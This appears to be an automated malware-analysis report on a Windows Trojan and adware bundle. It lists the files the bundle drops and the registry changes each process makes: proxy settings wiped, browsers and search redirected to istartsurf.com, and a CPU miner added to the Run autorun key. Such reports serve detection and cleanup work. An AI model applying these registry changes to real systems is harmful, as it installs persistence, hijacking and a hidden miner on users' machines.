C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Rerarapepe[1].png (922 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp.CIS.part (612 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp\icc.dll (212 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\progress-bar.css (506 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\ironsrc_prot[1].png (364 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00063B3B.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\csshover3.htc (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Rerarapepe3[1].jpg (800 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Button.png (1 bytes)
%Program Files% (x86)\is383871.log (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005D99C.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp\sqlite3.dll (643 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\sponsored.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\ie6_main.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Button_Hover.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\15094FED_stp.EXE.part (381 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005D92E.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\RerarapepeV2_BG4[1].jpg (2178 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\form.bmp.Mask (244 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\ES.locale (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\isf_383810.flat (751 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\browse.css (337 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005ED98.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005E32D.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Close.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005DDEF.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\PT.locale (4 bytes)
C:\Users\"%CurrentUserName%"\Desktop\Continue DESPROTETOR DE LINKS Installation.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\000640C7.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\No_Button[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\15094FED_stp.EXE (6223 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp.CIS (5796 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Progress.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\BG.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005E2C0.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005DD92.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\logo[1].png (200 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278 (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Gometem[1].png (922 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\checkbox.css (190 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\main.css (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00063B5A.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Sihehihi_31_03_15[1].png (307 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\EN.locale (3 bytes)
Registry activity
The process ProtectService.exe:3580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4C 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Wow6432Node\IHProtect]
"ptid" = "pcm"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
"AutoDetect"
The process ProtectService.exe:3668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
"AutoConfigURL"
"ProxyServer"
The process g3CvT78vSMa0N0LPai7Qvt_mb_1.exe:1884 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "25 CC 85 1E BF 72 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "C4 83 39 63 9A 83 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 44 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process ProtectWindowsManager.exe:3736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 0A 00 00 00 09 00 00 00 00 00 00 00"
"DefaultConnectionSettings" = "46 00 00 00 08 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "7D 6C C9 96 9A 83 D0 01"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
"WpadDetectedUrl" = ""
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "A0 85 4E 73 9A 83 D0 01"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
The process ProtectWindowsManager.exe:3316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\services\eventlog\Application\WindowsMangerProtect]
"EventMessageFile" = "C:\ProgramData\WindowsMangerPro"
"TypesSupported" = "7"
The process 15094FED_stp.EXE:3668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DesProtetor]
"Publisher" = "DesprotetorINC"
"DisplayVersion" = "1.0"
"DisplayName" = "DesProtetor"
[HKLM\SOFTWARE\DesProtetor]
"Version" = "1.0.0"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DesProtetor]
"UninstallString" = "%Program Files% (x86)\DesProtetor\uninst.exe"
"Comments" = "Tenha acesso direto aos links sem passar por nenhum protetor de Links ou publicidades"
"QuietUninstallString" = "%Program Files% (x86)\DesProtetor\uninst.exe"
The process cpuminer-x11opt-setup.exe:3752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\cpuminer]
"UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\cpuminer\cpuminer-uninst.exe"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files% (x86)\Google\Update\1.3.25.11, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\nsProcess.dll,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\cpuminer]
"InstallLocation" = "C:\Windows\system32"
"DisplayName" = "CPU Miner"
"Publisher" = "Open Source"
"DisplayIcon" = "C:\Windows\system32\cpuminer-gw64.exe"
"EstimatedSize" = "1316"
"DisplayVersion" = "1.1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"cpuminer" = "C:\Windows\system32\cpuminer-gw64.exe"
The process DesProtetor.exe:4032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 08 00 00 00 09 00 00 00 00 00 00 00"
"DefaultConnectionSettings" = "46 00 00 00 07 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "A0 85 4E 73 9A 83 D0 01"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "13 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
"WpadDetectedUrl" = ""
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "BE 7F E7 6B 9A 83 D0 01"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
The process wpm_v20.0.0.2227.exe:3268 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Wow6432Node\supWindowsMangerProtect]
"ptid" = "pcm"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe:3948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ActSys]
"DisplayVersion" = "1.2.0"
"DisplayName" = "ActSys"
[HKLM\SOFTWARE\ActSys]
"Version" = "1.2.0"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ActSys]
"Publisher" = "NINJASOFT LLC"
"QuietUninstallString" = "%Program Files% (x86)\ActSys\remove_ActSys.exe /S"
"UninstallString" = "%Program Files% (x86)\ActSys\remove_ActSys.exe /S"
"Comments" = "Browse safe online with our product! It alerts you if a page is harmful for your computer (Build ID: CWxGaP3QbYgwfMaFKJSDGrZa)"
The process QQBrowser.exe:3824 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process QQBrowser.exe:3212 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Mozilla\Extends]
"AppID" = "quick_searchff@gmail.com"
[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E\@""%windir%\System32]
"ie4uinit.exe"",-738" = "Start Internet Explorer without ActiveX controls or browser extensions."
[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{33BB0A4E-99AF-4226-BDF6-49120163DE86}"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Search Page" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"Publisher" = "istartsurf"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Default_Search_URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
[HKLM\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command]
"(Default)" = "%Program Files% (x86)\Mozilla Firefox\firefox.exe http://www.istartsurf.com/?type=sc&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"DisplayName" = "istartsurf"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
[HKLM\SOFTWARE\Wow6432Node\istartsurfSoftware\istartsurfhp]
"oem" = "pcm"
"Time" = "Type: REG_QWORD, Length: 8"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Search_URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E]
"LanguageList" = "en-US, en"
[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E\@""%systemroot%\system32\windowspowershell\v1.0]
"powershell.exe"",-111" = "Performs object-based (command-line) functions"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKLM\SOFTWARE\Clients\StartMenuInternet\VMWAREHOSTOPEN.EXE\shell\open\command]
"(Default)" = "%Program Files%\VMware\VMware Tools\VMwareHostOpen.exe http://www.istartsurf.com/?type=sc&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Google Chrome\shell\open\command]
"(Default)" = "%Program Files% (x86)\Google\Chrome\Application\chrome.exe http://www.istartsurf.com/?type=sc&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{33BB0A4E-99AF-4226-BDF6-49120163DE86}"
[HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe http://www.istartsurf.com/?type=sc&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"DisplayIcon" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe"
[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"NewTabPageShow" = "1"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
"Search Page" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKCU\Software\Mozilla\Extends]
"UID" = "535559167_198339_B48A115F"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
"DisplayName" = "istartsurf"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKCU\Software\Mozilla\Extends]
"ptid" = "pcm"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{33BB0A4E-99AF-4226-BDF6-49120163DE86}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"DisplayName" = "istartsurf uninstall"
[HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox\Extensions]
"quick_searchff@gmail.com" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\quick_searchff@gmail.com"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe -ptid=pcm"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"DisplayName" = "istartsurf"
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe:3816 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WNet]
"Publisher" = "BR SOFTWARE LLC"
"DisplayName" = "WNet"
"UninstallString" = "%Program Files% (x86)\WNet\uninst.exe"
[HKLM\SOFTWARE\WNet]
"Version" = "1.0.0"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WNet]
"Comments" = "The best offers in internet just one click away from you (ID: aGf9F1GWmcyPdxOIFdIm7cfc)"
"QuietUninstallString" = "%Program Files% (x86)\WNet\uninst.exe"
"DisplayVersion" = "1.0"
The process %original file name%.exe:1512 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "25 CC 85 1E BF 72 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "35 BC BD 62 9A 83 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
